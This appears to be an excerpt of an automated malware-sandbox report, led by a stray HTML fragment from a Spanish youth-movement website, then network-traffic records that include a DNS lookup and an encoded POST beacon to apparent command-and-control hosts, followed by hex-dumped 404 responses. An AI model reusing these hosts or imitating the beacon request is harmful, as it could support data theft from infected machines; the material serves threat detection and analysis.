href="https://www.youtube.com/channel/UCz92hpqzrnHultxRscMZ5pQ"><span class="screen-reader-text">YOUTUBE</span></a></li></ul></div></div></div></div></div><div class="header-bottom"><div class="tg-container"><div class="logo"><div class="logo-text site-branding"><p class="site-title"><a href="https://hzw.avt.temporary.site/" rel="home">MOVIMIENTO JUVENTUD COMUNITARIA</a></p></div></div><div class="site-navigation-wrapper"><nav id="site-navigation" class="main-navigation" role="navigation"><div class="menu-toggle"> <i class="fa fa-bars"></i></div><div class="menu-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-741"><a href="https://hzw.avt.temporary.site/">Inicio</a></li><li id="menu-item-748" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-748"><a href="https://hzw.avt.temporary.site/blog-4/">Movimiento JC</a></li><li id="menu-item-737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-737"><a href="https://hzw.avt.temporary.site/contact/">Contact</a></li></ul></div></nav></div><div class="header-action-container"><div class="cart-wrap"><div class="flash-cart-views"> <a href="https://hzw.avt.temporary.site/cart/" class="wcmenucart-contents"> <i class="fa fa-opencart"></i> <span class="cart-value">0</span> </a></div><div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Carrito</h2><div class="widget_shopping_cart_content"></div><
Source: unknown DNS traffic detected: queries for: www.cqyh.one
Source: unknown HTTP traffic detected: POST /e6xn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.d4ffo73dz.sbsContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 193Origin: http://www.d4ffo73dz.sbsReferer: http://www.d4ffo73dz.sbs/e6xn/User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 62 76 4f 74 3d 50 44 49 43 48 71 78 2f 4e 49 50 58 6f 5a 4f 52 38 6a 35 57 37 6a 58 56 59 74 39 76 31 57 70 49 2f 32 4d 6c 45 73 65 53 67 4b 4f 43 6a 4e 6b 59 44 68 62 48 53 58 48 45 45 5a 62 72 6c 52 77 4d 34 5a 6f 48 53 4a 69 35 79 62 36 68 39 46 31 31 4e 6d 6d 36 61 74 4b 2b 41 77 38 6a 55 65 78 6c 6d 73 6e 4c 6a 72 7a 74 6f 4d 55 48 47 47 57 43 71 52 59 41 66 72 73 72 6f 47 59 42 43 41 42 69 30 35 41 4b 61 66 30 73 4b 73 4f 33 44 33 72 35 51 34 41 6a 75 77 62 50 4e 38 6e 34 38 4e 58 52 47 35 66 30 35 59 63 7a 77 42 74 30 2f 4c 46 53 75 36 51 53 75 48 69 4c 54 4c 76 35 Data Ascii: bvOt=PDICHqx/NIPXoZOR8j5W7jXVYt9v1WpI/2MlEseSgKOCjNkYDhbHSXHEEZbrlRwM4ZoHSJi5yb6h9F11Nmm6atK+Aw8jUexlmsnLjrztoMUHGGWCqRYAfrsroGYBCABi05AKaf0sKsO3D3r5Q4AjuwbPN8n48NXRG5f05YczwBt0/LFSu6QSuHiLTLv5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Mon, 18 Mar 2024 13:46:06 GMTContent-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverContent-Length: 985Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 64 65 3d 34 30 34 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 32 31 2e 31 36 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 09 76 61 72 20 72 65 66 65 72 65 72 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 09 76 61 72 20 75 72 6c 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 29 3b 0a 09 76 61 72 20 6d 73 67 20 3d 20 27 4e 6f 25 32 30 73 75 63 68 25 32 30 66 69 6c 65 25 32 30 6f 72 25 32 30 64 69 72 65 63 74 6f 72 79 2e 27 3b 0a 20 20 20 20 76 61 72 20 68 6f 73 74 6e 61 6d 65 3d 27 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 27 3b 0a 09 76 61 72 20 65 76 65 6e 74 5f 69 64 3d 27 27 3b 0a 09 76 61 72 20 61 61 61 61 61 61 61 20 3d 20 28 27 3c 73 63 72 27 2b 27 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 72 72 6f 72 2e 6b 61 6e 67 6c 65 77 65 62 2e 6e 65 74 2f 3f 63 6f 64 65 3d 34 30 34 26 76 68 3d 76 68 73 61 35 37 36 39 38 22 3e 3c 2f 73 63 72 27 20 2b 20 27 69 70 74 3e 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
